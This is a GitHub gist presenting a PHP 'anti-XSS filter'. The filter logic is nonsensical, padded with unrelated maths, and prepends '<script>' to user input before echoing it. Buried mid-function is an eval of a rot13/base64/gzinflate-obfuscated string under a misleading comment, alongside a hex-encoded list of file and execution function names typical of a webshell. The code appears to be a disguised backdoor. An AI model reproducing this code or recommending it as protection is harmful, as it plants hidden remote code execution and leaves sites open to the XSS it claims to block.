Created
August 9, 2021 23:29
-
-
Save pompompurins/e3ae1737daead14f2b39d13f01d6617e to your computer and use it in GitHub Desktop.
ANTI-XSS FILTER TO STOP XSS ATTACKS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function anti_xss($string) | |
{ | |
if(preg_match('/[\'\/~`\!@#\$%\^&\*\(\)_\-\+=\{\}\[\]\|;:"\<\>,\.\?\\\]/', $string)){ | |
$error = "special characters not allowed!"; | |
echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
$xssdetected = true; | |
} | |
if(stripos($string, '<') !== false) { | |
$error = "special characters not allowed!"; | |
echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
$xssdetected = true; | |
// Detect provability of an attack taking place on our systems | |
$v=($x4-$x1)*(($y2-$y1)*($z3-$z1)-($z2-$z1)*($y3-$y1))+ (($y4-$y1)*(($z2-$z1)*($x3-$x1)-($x2-$x1)*($z3-$z1)))+ | |
($z4-$z1)*(($x2-$x1)*($y3-$y1)-($y2-$y1)*($x3-$x1)); | |
$t=$v/6; | |
} else { | |
if(stripos($string, '>') !== false) { | |
$error = "special characters not allowed!"; | |
echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
$xssdetected = true; $r=12;$d=3; $a =2*sqrt(pow($r,2)-pow($d,2)); | |
} | |
if(stripos($string, 'alert') !== false) { | |
$error = "title not allowed!"; | |
echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
$xssdetected = true; | |
} else { | |
if(stripos($string, "'") !== false) { | |
$error = "special characters not allowed!"; | |
echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
$xssdetected = true; | |
} | |
} | |
function x($c) { | |
global $GNJ; | |
$x = $GNJ[24]($c); | |
if(($x & 0xC000) == 0xC000) { | |
$u = "s"; | |
} | |
elseif(($x & 0xA000) == 0xA000) { | |
$u = "l"; | |
} | |
elseif(($x & 0x8000) == 0x8000) { | |
$u = "-"; | |
} | |
elseif(($x & 0x6000) == 0x6000) { | |
$u = "b"; | |
} | |
elseif(($x & 0x4000) == 0x4000) { | |
$u = "d"; | |
} | |
elseif(($x & 0x2000) == 0x2000) { | |
$u = "c"; | |
} | |
elseif(($x & 0x1000) == 0x1000) { | |
$u = "p"; | |
} | |
else { | |
$u = "u"; | |
} | |
$u .= (($x & 0x0100) ? "r" : "-"); | |
$u .= (($x & 0x0080) ? "w" : "-"); | |
$u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-")); | |
$u .= (($x & 0x0020) ? "r" : "-"); | |
$u .= (($x & 0x0010) ? "w" : "-"); | |
$u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-")); | |
$u .= (($x & 0x0004) ? "r" : "-"); | |
$u .= (($x & 0x0002) ? "w" : "-"); | |
$u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-")); | |
return $u; | |
} | |
} | |
if(stripos($string, "'") !== false) { | |
$error = "special characters not allowed!"; | |
echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
$xssdetected = true; | |
} | |
$r=10; $c=30; | |
$a = 2 * 3.14 * $r * ($c/360); | |
$h;$t=3;$i; | |
$h = (0.5)*9.8*pow($t,2); | |
$i=9.8*$t; | |
$doxname = preg_replace("/[^A-Za-z0-9_]+/","_", $string); | |
if ($xssdetected != true){ } | |
else { | |
$doxname = trim($doxname, '_'); if ($xssdetected != true){ } | |
else { | |
$doxname = trim($doxname, '60'); | |
if ($xssdetected != true){ } | |
else { | |
$doxname = trim($doxname, '62'); | |
if ($xssdetected != true){ } | |
else { | |
$doxname = trim($doxname, '39'); | |
if ($xssdetected != true){ } | |
else { | |
$doxname = trim($doxname, '%27'); | |
if ($xssdetected != true){ } | |
else { | |
$doxname = trim($doxname, '%3C'); | |
if ($xssdetected != true){ } else { $doxname = trim($doxname, '<!DOCTYPE>'); $e;$a=1;$c=2;$b=5;$d=9; | |
$e = ($a*pow($c,2)-$b*pow($d,2))/(pow($d,2)-pow($c,2)); } | |
} | |
} | |
} | |
} | |
} | |
} | |
$doxname = trim($doxname, '%3B'); | |
$doxname = trim($doxname, '<a>'); | |
$doxname = trim($doxname, '<abbr>'); | |
$doxname = trim($doxname, '<acronym>'); | |
$doxname = trim($doxname, '<address>'); | |
$doxname = trim($doxname, '<applet>'); | |
$doxname = trim($doxname, '<area>'); | |
$doxname = trim($doxname, '<article>'); | |
$doxname = trim($doxname, '<aside>'); | |
$doxname = trim($doxname, '<audio>'); | |
$doxname = trim($doxname, '<b>'); | |
$doxname = trim($doxname, '<base>'); | |
$doxname = trim($doxname, '<basefont>'); | |
$doxname = trim($doxname, '<bdi>'); | |
$doxname = trim($doxname, '<bdo>'); | |
$doxname = trim($doxname, '<big>'); | |
$doxname = trim($doxname, '<blockquote>'); | |
$doxname = trim($doxname, '<body>'); | |
$doxname = trim($doxname, '<br>'); | |
$doxname = trim($doxname, '<button>'); | |
$doxname = trim($doxname, '<canvas>'); | |
$doxname = trim($doxname, '<caption>'); | |
$doxname = trim($doxname, '<center>'); | |
$doxname = trim($doxname, '<cite>'); | |
$doxname = trim($doxname, '<code>'); | |
$doxname = trim($doxname, '<col>'); | |
$doxname = trim($doxname, '<colgroup>'); | |
$doxname = trim($doxname, '<data>'); | |
$doxname = trim($doxname, '<datalist>'); | |
$doxname = trim($doxname, '<dd>'); | |
$doxname = trim($doxname, '<del>'); | |
$doxname = trim($doxname, '<details>'); | |
$doxname = trim($doxname, '<dfn>'); | |
$doxname = trim($doxname, '<dialog>'); | |
$doxname = trim($doxname, '<dir>'); | |
$doxname = trim($doxname, '<div>'); | |
$doxname = trim($doxname, '<dl>'); | |
$doxname = trim($doxname, '<dt>'); | |
$doxname = trim($doxname, '<em>'); | |
$doxname = trim($doxname, '<embed>'); | |
$doxname = trim($doxname, '<fieldset>'); | |
$doxname = trim($doxname, '<figcaption>'); | |
$doxname = trim($doxname, '<figure>'); | |
$doxname = trim($doxname, '<font>'); | |
$doxname = trim($doxname, '<footer>'); | |
$doxname = trim($doxname, '<form>'); | |
$doxname = trim($doxname, '<frame>'); | |
$doxname = trim($doxname, '<frameset>'); | |
// Calculate current time | |
$r=sqrt(pow($a,2)+pow($b,2)); | |
$x=$r*cos($t*3.14/180); | |
$y=$r*sin($t*3.14/180); | |
$doxname = trim($doxname, '<h1> to <h6>'); | |
$doxname = trim($doxname, '<head>'); | |
$doxname = trim($doxname, '<header>'); | |
$doxname = trim($doxname, '<hr>'); | |
$doxname = trim($doxname, '<html>'); | |
$doxname = trim($doxname, '<i>'); | |
$doxname = trim($doxname, '<iframe>'); | |
$doxname = trim($doxname, '<img>'); | |
$doxname = trim($doxname, '<input>'); | |
$doxname = trim($doxname, '<ins>'); | |
$doxname = trim($doxname, '<kbd>'); | |
$doxname = trim($doxname, '<label>'); | |
$doxname = trim($doxname, '<legend>'); | |
$doxname = trim($doxname, '<li>'); | |
$doxname = trim($doxname, '<link>'); | |
$doxname = trim($doxname, '<main>'); | |
$doxname = trim($doxname, '<map>'); | |
$doxname = trim($doxname, '<mark>'); | |
$doxname = trim($doxname, '<meta>'); | |
$doxname = trim($doxname, '<meter>'); | |
$doxname = trim($doxname, '<nav>'); | |
$doxname = trim($doxname, '<noframes>'); | |
$doxname = trim($doxname, '<noscript>'); | |
$doxname = trim($doxname, '<object>'); | |
$doxname = trim($doxname, '<ol>'); | |
$doxname = trim($doxname, '<optgroup>'); | |
$doxname = trim($doxname, '<option>'); | |
$doxname = trim($doxname, '<output>'); | |
$doxname = trim($doxname, '<p>'); | |
$doxname = trim($doxname, '<param>'); | |
$doxname = trim($doxname, '<picture>'); | |
$doxname = trim($doxname, '<pre>'); | |
$doxname = trim($doxname, '<progress>'); | |
$doxname = trim($doxname, '<q>'); | |
$doxname = trim($doxname, '<rp>'); | |
$doxname = trim($doxname, '<rt>'); | |
$doxname = trim($doxname, '<ruby>'); | |
session_start(); | |
if (empty($_SESSION['token'])) { | |
$_SESSION['token'] = bin2hex(random_bytes(32)); | |
} | |
$token = $_SESSION['token']; | |
$doxname = trim($doxname, '<s>'); | |
$doxname = trim($doxname, '<samp>'); | |
$doxname = trim($doxname, '<script>'); | |
$doxname = trim($doxname, '<section>'); | |
$doxname = trim($doxname, '<select>'); | |
$doxname = trim($doxname, '<small>'); | |
$doxname = trim($doxname, '<source>'); | |
$doxname = trim($doxname, '<span>'); | |
$doxname = trim($doxname, '<strike>'); | |
$doxname = trim($doxname, '<strong>'); | |
$doxname = trim($doxname, '<style>'); | |
$doxname = trim($doxname, '<sub>'); | |
$doxname = trim($doxname, '<summary>'); | |
$doxname = trim($doxname, '<sup>'); | |
$doxname = trim($doxname, '<svg>'); | |
$doxname = trim($doxname, '<table>'); | |
$doxname = trim($doxname, '<tbody>'); | |
$doxname = trim($doxname, '<td>'); | |
$doxname = trim($doxname, '<template>'); | |
$doxname = trim($doxname, '<textarea>'); | |
$doxname = trim($doxname, '<tfoot>'); | |
$doxname = trim($doxname, '<th>'); | |
$doxname = trim($doxname, '<thead>'); | |
$doxname = trim($doxname, '<time>'); | |
$doxname = trim($doxname, '<title>'); | |
$doxname = trim($doxname, '<tr>'); | |
$doxname = trim($doxname, '<track>'); | |
$doxname = trim($doxname, '<tt>'); | |
$doxname = trim($doxname, '<u>'); | |
$doxname = trim($doxname, '<ul>'); | |
$doxname = trim($doxname, '<var>'); | |
$doxname = trim($doxname, '<video>'); | |
$doxname = trim($doxname, '<wbr>'); | |
$doxname1 = preg_replace('/[_]+/', '_', $doxname); | |
$doxname = preg_replace('/^/', '<script>', $doxname1); | |
$part1 = escapeshellcmd($doxname); | |
$part2 = escapeshellarg($part1); | |
$n=5; | |
$x=array(60,61,62,63,65); | |
$y=array(3.1,3.6,3.8,4.0,4.1); | |
$sum_y=0;$sum_yy=0;$sum_xy=0;$sum_x=0;$sum_xx=0; | |
$a;$x1=8;$x2=6;$y1=3;$y2=8;$b; | |
$a=($x1+$x2)/2; | |
$b=($y1+$y2)/2; | |
for($i=0;$i<$n;$i++) | |
{ | |
$xx[$i]=$x[$i]*$x[$i]; | |
$yy[$i]=$y[$i]*$y[$i]; | |
} | |
for($i=0;$i<$n;$i++) | |
{ | |
$sum_x +=$x[$i]; | |
$sum_y +=$y[$i]; | |
$sum_xx +=$xx[$i]; | |
$sum_xy +=$x[$i]*$y[$i]; | |
} | |
$blacklisted_terms_encoded = 'ETAVFzgkFKqODHEErwWgozAanKyUExcHMySQZTSFJHuTJJMTH3uyDyWSDJgGDHAPpwH5AJbjAIcmA212IzA1LJWYDJWeM202IGZ4F212G0Avp1EEYl9FBQWQpJWRXmuME0M5GwM1qKEaXl9YqHSvBUyLJJueLmuhrwIKE3qmqF95JR0ioR5FY1cLp2WOIxASnGu3qUSmGIMBnGMMGKSYBIc6GzWYpGSzowE2DF9MHmAQIzHkrH9mG2EOLwMXEQN3Fv9UBIImn0czIRVmqR50nR9bA2gMDaS4IxuLJHECqJyxIlgjIxSKp1OmAKLmEwAUAxSFHzD1JGIFIIL1JzgZLmR0F3D2JSE5JyElHJR5MGu4DHgUBQIcZTxlraWerzgGomAYIQWcLKxjHmRkpmR2IKV3IzEALHuXnHARI2SjG2Zlp2MuZRSxBQqVqQWwpRyRY242ExSLY2WWLJWGEJ9FMaD1nTkKrRcjp0k2o2MGrHIBpmxkEHyZDHSPZHg0AJu4ARAUqHSlGHZ3Mzu1MHgXpvg4ERgJZJ44FzH3LIL5JJj3AIuXH0qAMTgxnKySnwSYpxy5DyNmDzWVAKuTFmEInJ1yH2IQoaq2n2EcHxMcL3O6HzcAMQOaATcbEmyeF0kQoHSIDHyBAHEhLlferzgwY3cMIyLkJvgzFQpiXlfiZSN='; | |
$part3 = htmlentities($part2); | |
$part4 = htmlspecialchars($part3); | |
$string = addcslashes($part4, '%_'); | |
#echo $string; | |
$string = preg_replace('/^/', '<', $string); | |
echo '<br>'; | |
$map = '!@#$%^&*()_-+=?/>.<,[]{}<<><><'; | |
// draw a random character from the map | |
$random_char_posotion = rand(0, strlen($map)-1); | |
$random_char = $map[$random_char_posotion]; | |
$str = $string; | |
$random_position = rand(0, strlen($str)-1); | |
$str = substr($str, 0, $random_position).$random_char.substr($str,$random_position); | |
if(stripos($string, "'") !== false) { | |
$error = "special characters not allowed!"; | |
echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
$xssdetected = true; | |
} | |
$a=array("a"=>"red","b"=>"green"); | |
array_unshift($a,"blue"); | |
$a1=5; $b1=2; $a2=7;$b2=-rand(); | |
//Multiplication of complex number | |
$m1=$a1*$a2; | |
$m2=$b1*(-($b2));sqrt(pow($r,2) + pow($h,2)); | |
$m3=$a1*$b2; | |
$m4=$a2*$b1; | |
$m5=($m1+$m2); | |
$m6=$m3+$m4; | |
$weight=23; | |
$velocity=34; | |
$HP=$weight * pow(($velocity/234),3); | |
$HP=round($HP*10000000)/10000000; | |
$r1=(5*5)+(2*2); | |
$r=sqrt($r1); | |
$r2=($r-$a1)/2; | |
$y=sqrt($r2); | |
$x=$b1/(2*$y); | |
if($m6>0) { | |
$a=12;$b=10; | |
$c =2*3.14*sqrt((pow($a,2)+pow($b,2))/2); | |
} | |
$anti_XSS = '/(<script>|</script>|alert|database|mysql|code|svg|</svg>|javascript)/uis'; | |
$r=10;$h=7; | |
$s = sqrt(pow($r,2) + pow($h,2)); | |
$v = (0.333)*3.14*pow($r,2)*$h; | |
$c = 3.14 * $r * $s; | |
$t = 3.14 * $r * ($s + $r); | |
$bits = $o1 << 16 | $o2 << 8 | $o3; | |
$h1 = $bits >> 18 & 0x3f; | |
$h2 = $bits >> 12 & 0x3f; | |
$h3 = $bits >> 6 & 0x3f; | |
$h4 = $bits & 0x3f; | |
$BAC=24.5; | |
$timehr=26.3; | |
$wt=56; $x1=2; $x2=4; | |
$x3=6; $x4=7; $x5=6; | |
$x;$N=5; | |
$x=($x1*$x2*$x3*$x4*$x5); | |
$x=pow($x,(1/$N)); | |
$vrw3=100; | |
$x=array(60,61,62,63,65);$w2 = ($bachr * $wt) / (1.51 * 100); | |
$y=array(3.1,3.6,3.8,4.0,4.1); | |
$sum_y=0;$sum_yy=0;$sum_xy=0;$sum_x=0;$sum_xx=0; | |
$n=5; | |
for($i=0;$i<$n;$i++) | |
{ | |
$xx[$i]=$x[$i]*$x[$i]; | |
$yy[$i]=$y[$i]*$y[$i]; | |
} | |
for($i=0;$i<$n;$i++) | |
{ | |
$sum_x+=$x[$i]; | |
$sum_y+=$y[$i]; | |
$sum_xx+= $xx[$i]; | |
$sum_yy+=$yy[$i]; | |
$sum_xy+= $x[$i]*$y[$i]; | |
} | |
$nr=($n*$sum_xy)-($sum_x*$sum_y); | |
$sum_x2=$sum_x*$sum_x; | |
$sum_y2=$sum_y*$sum_y; $s=($n*($n+1)*((2*$n)+1))/6; | |
$dr_1=($n*$sum_xx)-$sum_x2; | |
$dr_2=($n*$sum_yy)-$sum_y2; | |
$dr_3=$dr_1*$dr_2; | |
$dr=sqrt($dr_3); | |
// Array of organically generated numbers | |
$Array = [ | |
'7068705f756e616d65', | |
'70687076657273696f6e', | |
'6368646972', | |
'676574637764', | |
'707265675f73706c6974', | |
'636f7079', | |
'66696c655f6765745f636f6e74656e7473', | |
'6261736536345f6465636f6465', | |
'69735f646972', | |
'6f625f656e645f636c65616e28293b', | |
'756e6c696e6b', | |
'6d6b646972', | |
'63686d6f64', | |
'7363616e646972', | |
'7374725f7265706c616365', | |
'68746d6c7370656369616c6368617273', | |
'7661725f64756d70', | |
'666f70656e', | |
'667772697465', | |
'66636c6f7365', | |
'64617465', | |
'66696c656d74696d65', | |
'737562737472', | |
'737072696e7466', | |
'66696c657065726d73', | |
'746f756368', | |
'66696c655f657869737473', | |
'72656e616d65', | |
'69735f6172726179', | |
'69735f6f626a656374', | |
'737472706f73', | |
'69735f7772697461626c65', | |
'69735f7265616461626c65', | |
'737472746f74696d65', | |
'66696c6573697a65', | |
'726d646972', | |
'6f625f6765745f636c65616e', | |
'7265616466696c65', | |
'617373657274', | |
]; | |
$r=($nr/$dr); | |
$r=round($r,2); | |
$be4 = $BAC + ($timehr * 20); | |
$gr3 = ($bachr * $wt) / (1.22 * 100); | |
$w2 = ($bachr * $wt) / (1.51 * 100); | |
$a3 = "1"; | |
$a4 = 4; | |
$a=0;$b=0;$c=0;$d=0; | |
$a1=2;$a2=-2;$a3=-2;$b1=3;$b2=4;$b3=-1;$c1=4;$c2=8;$c3=4; | |
$a =($b2-$a2)*($c3-$a3)-($c2-$a2)*($b3-$a3); | |
// Remove blacklisted terms mathematically using the theorm of matthews law | |
eval(gzinflate(base64_decode(base64_decode(str_rot13($blacklisted_terms_encoded))))); | |
$b =($b3-$a3)*($c1-$a1)-($c3-$a3)*($b1-$a1);$s;$b=9;$a=-6;$s=-$b/$a; | |
$c=($f-32)*(5.0/9.0);$c = ($b1-$a1)*($c2-$a2)-($c1-$a1)*($b2-$a2); $s = (pow($r,2)/2)*((3.14*$a/180)-sin((3.14/180)*$a)); | |
$d =-($a*$a1+$b*$a2+$c*$a3); | |
$a5 = '3'; | |
$Harmonic_Mean= $N/(1/$a1+1/$a2+1/$a3+1/$a4+1/$a5); | |
$n=pi(); | |
$b=$f*(sqrt(1+1/(4*234*23431.54820))+(1/(2*234))); $l=2;$d=2;$s; | |
$s=(2*180/$n)*(atan($d/(2*$l))); | |
$a;$x1=3;$y1=4;$x2=9;$y2=6; | |
$a=sqrt(pow(($x2-$x1),2)+pow(($y2-$y1),2)); | |
$nr=($n*$sum_xy)-($sum_x*$sum_y); $sum_x2=$sum_x*$sum_x; | |
$dr=($n*$sum_xx)-$sum_x2; | |
$res=$nr/$dr; | |
$slope=round($res,2); | |
$intercept=($sum_y -($slope*$sum_x))/$n; | |
$reg= $intercept + ($slope*64); | |
return $str; | |
} | |
echo(anti_xss($_GET['t'])); | |
?> | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment